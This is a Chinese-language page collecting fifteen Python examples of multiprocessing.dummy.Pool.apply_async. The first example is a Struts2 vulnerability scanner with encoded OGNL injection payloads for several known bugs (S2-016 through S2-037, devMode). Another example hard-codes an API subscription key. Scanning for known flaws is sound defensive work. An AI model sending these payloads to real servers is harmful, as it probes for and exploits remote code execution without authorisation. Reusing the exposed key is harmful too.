本文整理汇总了Python中multiprocessing.dummy.Pool.apply_async方法的典型用法代码示例。如果您正苦于以下问题:Python Pool.apply_async方法的具体用法?Python Pool.apply_async怎么用?Python Pool.apply_async使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类multiprocessing.dummy.Pool
的用法示例。
在下文中一共展示了Pool.apply_async方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: check_struct
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def check_struct(url):
global types
global isvul
isvul = False
types = []
payloads = []
s2_16payload = r'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%22dir%3A%22%2B%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
s2_19payload = r'debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()'
s2_32payload = r'method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a'
s2_33payload = r'/%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
s2_37payload = r'/%28%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
s2_devmode_payload = r'debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=devMode dir--***'
payloads.append(setPayload(s2_16payload, 's2_16payload'))
payloads.append(setPayload(s2_19payload, 's2_19payload'))
payloads.append(setPayload(s2_32payload, 's2_32payload'))
payloads.append(setPayload(s2_33payload, 's2_33payload'))
payloads.append(setPayload(s2_37payload, 's2_37payload'))
payloads.append(setPayload(s2_devmode_payload, 's2_devmode_payload'))
pool = Pool(6)
for payload in payloads:
pool.apply_async(func=url_request, args=(url, payload), callback=callback)
pool.close()
pool.join()
if isvul:
lock.acquire()
fileSave(url, types)
vulnerabilitys.append('[+]%s vulnerability exits %s!' % (url.strip(), ','.join(types)))
lock.release()
types = []
示例2: main
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def main():
n = 1000000
m = 1
m2 = 10000
m3 = 100
create_db()
pool = Pool(processes=5)
start = time.time()
fill(n)
fill_time = time.time() - start
print('{} inserts in {}s'.format(n,fill_time))
start = time.time()
results = []
for _ in range(m):
results.append(pool.apply_async(read, ()))
# results.append(pool.apply_async(read_dataset, ()))
for i in range(m2):
results.append(pool.apply_async(read_one, ()))
if i%m3 == 0:
results.append(pool.apply_async(fill, (1,)))
for r in results:
r.get(timeout=1000000)
read_time = time.time() - start
pool.terminate()
print('{}.{} reads in {}s'.format(m,m2,read_time))
示例3: execute
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def execute(self):
if pyqt:
self.assignment.emit(['zones finalized', 0])
self.aux_res.prepare(self.graph, self.results)
self.matrix.matrix_view = self.matrix.matrix_view.reshape((self.graph.num_zones, self.graph.num_zones,
self.results.classes['number']))
mat = self.matrix.matrix_view
pool = ThreadPool(self.results.cores)
all_threads = {'count': 0}
for orig in self.matrix.index:
i = int(self.graph.nodes_to_indices[orig])
if np.nansum(mat[i, :, :]) > 0:
if self.graph.fs[i] == self.graph.fs[i+1]:
self.report.append("Centroid " + str(orig) + " is not connected")
else:
pool.apply_async(self.func_assig_thread, args=(orig, all_threads))
# one_to_all(orig, self.matrix, self.graph, self.results, self.aux_res, 0)
pool.close()
pool.join()
self.results.link_loads = np.sum(self.aux_res.temp_link_loads, axis=2)
if pyqt:
self.assignment.emit(['text AoN', "Saving Outputs"])
self.assignment.emit(['finished_threaded_procedure', None])
示例4: apply
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def apply(request, company_id):
user = User.objects.get(email=request.user)
company = Company.objects.filter(id=company_id)[0]
if not user.profile or not user.profile.address:
return HttpResponseRedirect('/profile/')
if user.num_apps_left_today == 0:
context = {}
context['message'] = 'Sorry, you have exceeded max number of apps available per day. We are forced to have a cap because of limited server capabilities.'
return render(request, 'thankyou.html', context)
app = Application(user=user, company=company)
app.save()
user.num_apps_left_today -= 1
user.save()
pool = Pool(processes=1)
def fill():
url = random.choice(Client.objects.all()).ip + "fill"
user_json = UserToJson(UserPlain(user))
param = {'user':user_json, 'company_name':company.name, 'app_id':app.id}
r = requests.get(url, params=param)
pool.apply_async(fill)
context = {}
context['message'] = 'Thanks for applying. Our automated system will be filling out your app in the next 10 mins. Check your email for confirmation.'
if user.num_apps_left_today == daily_allowed_apps -1:
context['company'] = company
return render(request, 'thankyou.html', context)
示例5: run_client_code
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def run_client_code(self, command):
env = os.environ.copy()
env["GOOEY"] = "1"
print "run command:", command
p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, env=env)
self._process = p
pool = Pool(1)
pool.apply_async(self.read_stdout, (p, self.process_result))
示例6: query
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def query(id1, id2):
#now = time.time()
#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
#json1 = json.loads((urllib.urlopen(url)).read())['entities']
#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
#json2 = json.loads((urllib.urlopen(url)).read())['entities']
#print 'time use: ', time.time() - now
#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
#json1 = (json.loads((urllib.urlopen(url)).read()))['entities']
#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
#json2 = (json.loads((urllib.urlopen(url)).read()))['entities']
url1 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
url2 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
poolResult = []
pool = Pool(20)
poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url1,)))
poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url2,)))
poolResult.append(pool.apply_async(getPaperJson, (id1, 'RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId')))
poolResult.append(pool.apply_async(getPaperJson, (id2, 'F.FId,J.JId,C.CId,AA.AuId,AA.AfId,CC')))
pool.close()
#pool.join()
json1 = poolResult[0].get()
json2 = poolResult[1].get()
paperJson1 = poolResult[2].get()
paperJson2 = poolResult[3].get()
# print len(json2)
if json1 and json2:
#afId1 = -1
#afId2 = -1
#for author in json1[0]['AA']:
# if author['AuId'] == id1 and author.has_key('AfId'):
# afId1 = author['AfId']
#for author in json2[0]['AA']:
# if author['AuId'] == id2 and author.has_key('AfId'):
# afId2 = author['AfId']
#return query_AuId_AuId(id1, id2, afId1, afId2)
return query_AuId_AuId(id1, id2, json1, json2)
elif json1:
#afId1 = -1
#for author in json1[0]['AA']:
# if author['AuId'] == id1 and author.has_key('AfId'):
# afId1 = author['AfId']
#return query_AuId_Id(id1, id2, afId1)
return query_AuId_Id(id1, id2, json1, paperJson2)
elif json2:
#afId2 = -1
#for author in json2[0]['AA']:
# if author['AuId'] == id2 and author.has_key('AfId'):
# afId2 = author['AfId']
#return query_Id_AuId(id1, id2, afId2)
return query_Id_AuId(id1, id2, paperJson1, json2)
else:
if paperJson2.has_key('CC') and paperJson2['CC'] >= 50000:
return query_Id_Id_big(id1, id2, paperJson1, paperJson2)
else:
return query_Id_Id_small(id1, id2, paperJson1, paperJson2)
示例7: get_all_content
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def get_all_content(path):
contents = set()
pool = ThreadPool(100)
max_page = get_max_page()
for x in xrange(1, max_page + 1):
pool.apply_async(get_content, args=(x, contents))
pool.close()
pool.join()
store(path, contents)
示例8: get_blog
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def get_blog(path):
pool = ThreadPool(20)
url = 'http://www.yinwang.org'
contents = set()
for blog_url in get_blog_url(url):
pool.apply_async(get_content, args=(blog_url, contents))
pool.close()
pool.join()
store(path, contents, 'docs_cn')
示例9: run
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def run():
print 'Parent process %s.' % os.getpid()
p = Pool()
for i in range(9):
p.apply_async(long_time_task, args=(i,))
print 'Waiting for all sub processes done...'
p.close()
p.join()
print 'All sub processes done.'
示例10: Async_log
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def Async_log(user,url):
if 'op.baihe.com' in url:
mysql_op_log = Mysql.mysql_op(user, url)
Proc = Pool()
def Run():
mysql_op_log.op_log()
Proc.apply_async(Run)
Proc.close()
Proc.join()
示例11: RunClientCode
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def RunClientCode(self, command):
def doInBackground(process, callback):
while True:
line = process.stdout.readline()
if not line:
break
wx.CallAfter(self.core_gui.PublishConsoleMsg, line)
wx.CallAfter(callback, process)
p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
_pool = Pool(1)
_pool.apply_async(doInBackground, (p, self.HandleResult))
示例12: AsyncDispatcher
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
class AsyncDispatcher(object):
"""
Runs blockiong calls as synchronous tasks
"""
def __init__(self, num_threads=50):
self.pool = ThreadPool(processes=num_threads)
def run_as_asynch(self, task, on_success=None, on_error=None, on_complete=None):
"""
Transforms a blocking call into an asynchronous task
:param task: a function to run
:param on_complete: a function to call when the task has finished running.
Said function should accept the return value of the synchrouns task.
:return:
"""
def task_wrapper():
"""
encapsulates tasks to catch their errors,
as threadpool does not contain asynch error reporting by default
"""
try:
return task()
except Exception as ex:
logging.error(traceback.format_exc())
# report asynchronous exception:
if on_error:
# call callback on result thread (this is the worker thread)
self.pool.apply_async(on_error, args=(ex,))
# call the completion handler:
if on_complete:
# call callback on result thread (this is the worker thread)
self.pool.apply_async(on_complete)
# re-throw execution exeption to get function
raise Exception(ex)
def success_wrapper(result):
"""
called asynchronously when the task has finished running successfully
"""
# This handler is called on the result thread,
# so there is no need to reschedule the callback
#
# report success:
if on_success:
on_success(result)
# report that task is completed
if on_complete:
on_complete()
# run the task on a different thread:
result = self.pool.apply_async(task_wrapper, callback=success_wrapper)
return ScheduledTask(result)
示例13: aliveRun
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def aliveRun(self, threads, domains):
if type(domains) == type('a'):
self.alivescan(domains)
else:
pool = Pool(threads)
for domain in domains:
pool.apply_async(func=self.alivescan, args=(domain,))
pool.close()
pool.join()
print ''
return self.results
示例14: upload_stream
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def upload_stream(self, stream_ref, **kwargs):
if self.manifest["uploadId"] is None:
raise RuntimeError('Cannot call upload before initializing an upload using new_upload.')
# The pool of work we have available, and the sempahore to gate work into the pool (since just submitting
# work to the pool doesn't block on the number of processes available to do work in the pool)
pool = Pool(processes=self.parallel_process_count)
semaphore = Semaphore(self.parallel_process_count)
# A dict which will be shared between the threads in our pool (this would not work as-is with processes) but
# we use threads via multiprocessing.dummy. If we use processes, then a Manager would likely be needed for this.
#
# should_continue will only ever be set to False by _upload_stream_part so not too worried if we have multiple
# writers
#
# Queue should be thread safe (though for tracking the exceptions, order doesn't strictly matter)
shared_dict = {'should_continue': True, 'exceptions': Queue()}
part_counter = 0
apply_async_kwargs = kwargs.copy()
apply_async_kwargs['semaphore'] = semaphore
apply_async_kwargs['shared_dict'] = shared_dict
# We pull data from the stream until there is no more
keep_reading = True
while keep_reading:
if six.PY3:
read_bytes = stream_ref.buffer.read(self.part_size)
else:
read_bytes = stream_ref.read(self.part_size)
semaphore.acquire()
if len(read_bytes) != 0:
pool.apply_async(self._upload_stream_part, (part_counter, read_bytes), apply_async_kwargs)
part_counter += 1
keep_reading = (len(read_bytes) == self.part_size) and shared_dict['should_continue']
# If we're here we've either sent off all the work we needed to (and so are waiting on remaining bits to finish)
# or we terminated early because of an exception in one of our uploads. In either case, close off the pool to
# any more work and let the remaining work finish gracefully
pool.close()
pool.join()
# If we had at least one exception then throw out an error to indicate failure
if not shared_dict['exceptions'].empty():
raise MultipartUploadError(error_causes_queue=shared_dict['exceptions'])
# Because we processed in parallel, the parts in the manifest may be out of order. Re-order them based on the part number
# because commit assumes that they are ordered
self.manifest['parts'].sort(key=lambda part: part['part_num'])
示例15: check_main
# 需要导入模块: from multiprocessing.dummy import Pool [as 别名]
# 或者: from multiprocessing.dummy.Pool import apply_async [as 别名]
def check_main(self, xml_file, server):
# 检查是否选择了文件
if self.filename == '':
self.lb.config(text="请先选择 index.xml 文件")
else:
self.lfc_field_1_t.insert(END, 'Start [%s]\n' % xml_file, 'blue')
self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
self.lfc_field_1_t.update()
component_num = set()
url_num = 0
# 检查 ini 配置文件是否存在
if os.path.isfile(server):
tree = ET.ElementTree(file=xml_file)
iau_url = ''
# 使用线程池,否则打包后的exe由于IO太高容易异常
async_pool = ThreadPool(100)
for product in tree.findall('products'):
pid = 'c' + product.attrib['class'] + 't' + product.attrib['type'] + 'v' + product.attrib['ver'] + 'l' + product.attrib['lang'] + 'p' + product.attrib['plat'] + 'r' + product.attrib['region'] + 'o' + product.attrib['oem']
p = re.compile(r'%s$' % pid)
with open(server, 'r') as f:
for line in f.readlines():
if re.search(p, line.strip()):
iau_url = line.strip()
url_num += 1
break
if iau_url == '':
self.lfc_field_1_t.insert(END, '%s 对应的 URL 在 ini 配置文件中未找到,请检查配置!\n' % pid, 'red')
self.lfc_field_1_t.update()
else:
component_list = set()
# .//entity 表示搜索当前 products 下的所有 entity
for entity in product.findall('.//entity'):
component = entity.attrib['name']
component_num.add(component)
component_list.add(component)
async_pool.apply_async(self.iau_check, (component_list, iau_url))
async_pool.close()
async_pool.join()
else:
self.lfc_field_1_t.insert(END, '未找到 %s 配置文件,请确保该配置文件存放在 exe 同目录下!\n' % server, 'red')
self.lfc_field_1_t.update()
self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
self.lfc_field_1_t.insert(END, 'End [%s]\n' % xml_file, 'blue')
self.lfc_field_1_t.insert(END, '---- 本次 AU 涉及 % s 个 component,%s 个 product \n' % (len(component_num), url_num), 'blue')
self.lfc_field_1_t.insert(END, '---- Pass: % s 个 \n' % self.pass_num, 'blue')
self.lfc_field_1_t.insert(END, '---- Fail: % s 个 \n\n' % self.fail_num, 'blue')
self.pass_num = 0
self.fail_num = 0
self.lfc_field_1_t.update()
self.lfc_field_1_t.see(END)